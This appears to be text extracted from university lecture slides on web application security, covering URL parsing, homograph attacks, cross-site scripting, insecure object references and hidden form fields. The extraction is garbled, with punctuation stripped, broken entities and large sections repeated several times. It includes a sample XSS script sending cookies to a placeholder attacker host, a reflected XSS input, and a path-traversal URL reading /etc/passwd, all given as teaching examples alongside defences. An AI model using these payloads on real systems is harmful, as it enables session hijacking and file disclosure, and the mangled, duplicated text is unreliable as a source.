Extension of 38 characters to 100000 glyphs allowedmany homograph attacks
Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS
registrars
We have (puny) browser search engine defences forthis Moral probably better to stick with ASCII
Overall consequences
Parsing URLs more complicated than you imagined
Eacute better to use well-tested libraries than ad hoc code
But for output want to be very careful
Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority
Overall consequences
Eyeballs can easily be fooled when looking at URLs
httpexamplecomampgibberish=1234167772161
httpexamplecomcoredumpcx
httpexamplecomcoredumpcx
Which server is visited by these URLs
Examples from The Tangled Web
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
XSS attacks in general
Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code
Eacute typically script code
Many possible aims
Eacute display random images popup windowsEacute change page contents eg alter bank account
numberEacute session hijacking steal session cookies
Session hijacking with XSS
[Picture from Innocent Code
Example injected script
ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)
ltscriptgt
Eacute redirects victimrsquos browser to attackers site passingcookie
Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back
again
Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed inthe visited page Suppose
httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gccgt
dynamically makes HTML embedding title directly
lth1gtMan GCClth1gt
An attacker could use this with a malicious input
title=ltscriptgtltscriptgtprogram=gcc
which eg steals a cookie
Exercise Explain how this attack works in practice
XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering
Plain output HTML encoding
Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)
Marked up output complex filtering
Eacute Need to work through tags in input and rule outrisky ones Scripts may appear in attributes Flaky
Marked up output DSL
Eacute A better approach use a dedicated syntax convertto restricted subset of HTML
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction
A ldquocoolrdquo PHP script showhtmlphp
Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to
wrapped version
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd
Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth
Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)
Authorization and object access
What was the problem here
Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written
Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence
There should have been a re-authorization stepA well-written app should only allow access to its ownresources
Looking at anyonersquos bank account
ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt
ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt
ltselectgtltinput type=submit name=show value=Show Accountgt
ltformgt
Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo
A genius clearly
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Server address
address
RFC is quite strict
Eacute case-insensitive DNS name (wwwedacuk)Eacute IPv4 12921523364Eacute IPv6 in brackets [20014860a005000068]
Implementations are more relaxed
Eacute range of characters beyond DNS specEacute mix of digit formats http0x7f1 =
http127001
Question Why is this relevant to secure web appprogramming
Server port
8080
A decimal number preceded by a colon
Usually omitted the default port number for protocolused
Eacute eg 80 for HTTP 443 for HTTPS 21 for FTPEacute sometimes servers on non-standard ports is useful
Question What threats might this lead to
Hierarchical file path
pathtoresource
Eacute A Unix-style path Must resolve and Eacute Relative paths allow for non-fully-qualified URLsEacute old style apps
Eacute direct connection with file systemEacute resource=HTML file served by server
Eacute modern appsEacute very indirect Eacute complicated URL rewriting dynamic contentEacute paths mapped to parts of programs or databaseEacute server may be embedded in app
Question What implications does this have forreviewing the security of web apps
Query string
search=purple+bananas
Optional intended to pass arbitrary parameters toresource Commonly used syntax
name1=value1ampname2=value2
is not part of URL syntax Syntax is related to mailHTML forms So
Eacute server may not presumeenforce query stringformat
Eacute web applications may legally use other forms after
Fragment identifier
lastsection
Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements
Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing
Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations
Metacharacters
Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp rsquo ( ) =
Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes
The RFC does not specify a fixed mapping andbrowsers try to interpret as many user inputs aspossible
Eg examples like http65xample63om
Moreover RFCs are not always followed
Non-ASCII text encodings in URLsEacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow
behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part
Extension of 38 characters to 100000 glyphs allowedmany homograph attacks
Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS
registrars
We have (puny) browser search engine defences forthis Moral probably better to stick with ASCII
Overall consequences
Parsing URLs more complicated than you imagined
Eacute better to use well-tested libraries than ad hoc code
But for output want to be very careful
Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority
Overall consequences
Eyeballs can easily be fooled when looking at URLs
httpexamplecomampgibberish=1234167772161
httpexamplecomcoredumpcx
httpexamplecomcoredumpcx
Which server is visited by these URLs
Examples from The Tangled Web
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
XSS attacks in general
Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code
Eacute typically script code
Many possible aims
Eacute display random images popup windowsEacute change page contents eg alter bank account
numberEacute session hijacking steal session cookies
Session hijacking with XSS
[Picture from Innocent Code
Example injected script
ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)
ltscriptgt
Eacute redirects victimrsquos browser to attackers site passingcookie
Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back
again
Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed inthe visited page Suppose
httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gccgt
dynamically makes HTML embedding title directly
lth1gtMan GCClth1gt
An attacker could use this with a malicious input
title=ltscriptgtltscriptgtprogram=gcc
which eg steals a cookie
Exercise Explain how this attack works in practice
XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering
Plain output HTML encoding
Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)
Marked up output complex filtering
Eacute Need to work through tags in input and rule outrisky ones Scripts may appear in attributes Flaky
Marked up output DSL
Eacute A better approach use a dedicated syntax convertto restricted subset of HTML
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction
A ldquocoolrdquo PHP script showhtmlphp
Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to
wrapped version
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd
Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth
Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)
Authorization and object access
What was the problem here
Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written
Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence
There should have been a re-authorization stepA well-written app should only allow access to its ownresources
Looking at anyonersquos bank account
ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt
ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt
ltselectgtltinput type=submit name=show value=Show Accountgt
ltformgt
Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo
A genius clearly
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Server port
8080
A decimal number preceded by a colon
Usually omitted the default port number for protocolused
Eacute eg 80 for HTTP 443 for HTTPS 21 for FTPEacute sometimes servers on non-standard ports is useful
Question What threats might this lead to
Hierarchical file path
pathtoresource
Eacute A Unix-style path Must resolve and Eacute Relative paths allow for non-fully-qualified URLsEacute old style apps
Eacute direct connection with file systemEacute resource=HTML file served by server
Eacute modern appsEacute very indirect Eacute complicated URL rewriting dynamic contentEacute paths mapped to parts of programs or databaseEacute server may be embedded in app
Question What implications does this have forreviewing the security of web apps
Query string
search=purple+bananas
Optional intended to pass arbitrary parameters toresource Commonly used syntax
name1=value1ampname2=value2
is not part of URL syntax Syntax is related to mailHTML forms So
Eacute server may not presumeenforce query stringformat
Eacute web applications may legally use other forms after
Fragment identifier
lastsection
Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements
Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing
Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations
Metacharacters
Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp rsquo ( ) =
Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes
The RFC does not specify a fixed mapping andbrowsers try to interpret as many user inputs aspossible
Eg examples like http65xample63om
Moreover RFCs are not always followed
Non-ASCII text encodings in URLsEacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow
behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part
Extension of 38 characters to 100000 glyphs allowedmany homograph attacks
Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS
registrars
We have (puny) browser search engine defences forthis Moral probably better to stick with ASCII
Overall consequences
Parsing URLs more complicated than you imagined
Eacute better to use well-tested libraries than ad hoc code
But for output want to be very careful
Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority
Overall consequences
Eyeballs can easily be fooled when looking at URLs
httpexamplecomampgibberish=1234167772161
httpexamplecomcoredumpcx
httpexamplecomcoredumpcx
Which server is visited by these URLs
Examples from The Tangled Web
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
XSS attacks in general
Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code
Eacute typically script code
Many possible aims
Eacute display random images popup windowsEacute change page contents eg alter bank account
numberEacute session hijacking steal session cookies
Session hijacking with XSS
[Picture from Innocent Code
Example injected script
ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)
ltscriptgt
Eacute redirects victimrsquos browser to attackers site passingcookie
Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back
again
Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed inthe visited page Suppose
httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gccgt
dynamically makes HTML embedding title directly
lth1gtMan GCClth1gt
An attacker could use this with a malicious input
title=ltscriptgtltscriptgtprogram=gcc
which eg steals a cookie
Exercise Explain how this attack works in practice
XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering
Plain output HTML encoding
Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)
Marked up output complex filtering
Eacute Need to work through tags in input and rule outrisky ones Scripts may appear in attributes Flaky
Marked up output DSL
Eacute A better approach use a dedicated syntax convertto restricted subset of HTML
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction
A ldquocoolrdquo PHP script showhtmlphp
Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to
wrapped version
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd
Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth
Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)
Authorization and object access
What was the problem here
Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written
Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence
There should have been a re-authorization stepA well-written app should only allow access to its ownresources
Looking at anyonersquos bank account
ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt
ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt
ltselectgtltinput type=submit name=show value=Show Accountgt
ltformgt
Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo
A genius clearly
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Hierarchical file path
pathtoresource
Eacute A Unix-style path Must resolve and Eacute Relative paths allow for non-fully-qualified URLsEacute old style apps
Eacute direct connection with file systemEacute resource=HTML file served by server
Eacute modern appsEacute very indirect Eacute complicated URL rewriting dynamic contentEacute paths mapped to parts of programs or databaseEacute server may be embedded in app
Question What implications does this have forreviewing the security of web apps
Query string
search=purple+bananas
Optional intended to pass arbitrary parameters toresource Commonly used syntax
name1=value1ampname2=value2
is not part of URL syntax Syntax is related to mailHTML forms So
Eacute server may not presumeenforce query stringformat
Eacute web applications may legally use other forms after
Fragment identifier
lastsection
Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements
Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing
Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations
Metacharacters
Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp rsquo ( ) =
Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes
The RFC does not specify a fixed mapping andbrowsers try to interpret as many user inputs aspossible
Eg examples like http65xample63om
Moreover RFCs are not always followed
Non-ASCII text encodings in URLsEacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow
behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part
Extension of 38 characters to 100000 glyphs allowedmany homograph attacks
Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS
registrars
We have (puny) browser search engine defences forthis Moral probably better to stick with ASCII
Overall consequences
Parsing URLs more complicated than you imagined
Eacute better to use well-tested libraries than ad hoc code
But for output want to be very careful
Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority
Overall consequences
Eyeballs can easily be fooled when looking at URLs
httpexamplecomampgibberish=1234167772161
httpexamplecomcoredumpcx
httpexamplecomcoredumpcx
Which server is visited by these URLs
Examples from The Tangled Web
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
XSS attacks in general
Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code
Eacute typically script code
Many possible aims
Eacute display random images popup windowsEacute change page contents eg alter bank account
numberEacute session hijacking steal session cookies
Session hijacking with XSS
[Picture from Innocent Code
Example injected script
ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)
ltscriptgt
Eacute redirects victimrsquos browser to attackers site passingcookie
Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back
again
Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed inthe visited page Suppose
httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gccgt
dynamically makes HTML embedding title directly
lth1gtMan GCClth1gt
An attacker could use this with a malicious input
title=ltscriptgtltscriptgtprogram=gcc
which eg steals a cookie
Exercise Explain how this attack works in practice
XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering
Plain output HTML encoding
Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)
Marked up output complex filtering
Eacute Need to work through tags in input and rule outrisky ones Scripts may appear in attributes Flaky
Marked up output DSL
Eacute A better approach use a dedicated syntax convertto restricted subset of HTML
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction
A ldquocoolrdquo PHP script showhtmlphp
Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to
wrapped version
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd
Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth
Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)
Authorization and object access
What was the problem here
Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written
Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence
There should have been a re-authorization stepA well-written app should only allow access to its ownresources
Looking at anyonersquos bank account
ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt
ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt
ltselectgtltinput type=submit name=show value=Show Accountgt
ltformgt
Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo
A genius clearly
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Query string
search=purple+bananas
Optional intended to pass arbitrary parameters toresource Commonly used syntax
name1=value1ampname2=value2
is not part of URL syntax Syntax is related to mailHTML forms So
Eacute server may not presumeenforce query stringformat
Eacute web applications may legally use other forms after
Fragment identifier
lastsection
Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements
Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing
Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations
Metacharacters
Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp rsquo ( ) =
Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes
The RFC does not specify a fixed mapping andbrowsers try to interpret as many user inputs aspossible
Eg examples like http65xample63om
Moreover RFCs are not always followed
Non-ASCII text encodings in URLsEacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow
behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part
Extension of 38 characters to 100000 glyphs allowedmany homograph attacks
Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS
registrars
We have (puny) browser search engine defences forthis Moral probably better to stick with ASCII
Overall consequences
Parsing URLs more complicated than you imagined
Eacute better to use well-tested libraries than ad hoc code
But for output want to be very careful
Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority
Overall consequences
Eyeballs can easily be fooled when looking at URLs
httpexamplecomampgibberish=1234167772161
httpexamplecomcoredumpcx
httpexamplecomcoredumpcx
Which server is visited by these URLs
Examples from The Tangled Web
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
XSS attacks in general
Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code
Eacute typically script code
Many possible aims
Eacute display random images popup windowsEacute change page contents eg alter bank account
numberEacute session hijacking steal session cookies
Session hijacking with XSS
[Picture from Innocent Code
Example injected script
ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)
ltscriptgt
Eacute redirects victimrsquos browser to attackers site passingcookie
Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back
again
Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed inthe visited page Suppose
httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gccgt
dynamically makes HTML embedding title directly
lth1gtMan GCClth1gt
An attacker could use this with a malicious input
title=ltscriptgtltscriptgtprogram=gcc
which eg steals a cookie
Exercise Explain how this attack works in practice
XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering
Plain output HTML encoding
Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)
Marked up output complex filtering
Eacute Need to work through tags in input and rule outrisky ones Scripts may appear in attributes Flaky
Marked up output DSL
Eacute A better approach use a dedicated syntax convertto restricted subset of HTML
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction
A ldquocoolrdquo PHP script showhtmlphp
Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to
wrapped version
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd
Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth
Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)
Authorization and object access
What was the problem here
Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written
Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence
There should have been a re-authorization stepA well-written app should only allow access to its ownresources
Looking at anyonersquos bank account
ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt
ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt
ltselectgtltinput type=submit name=show value=Show Accountgt
ltformgt
Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo
A genius clearly
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
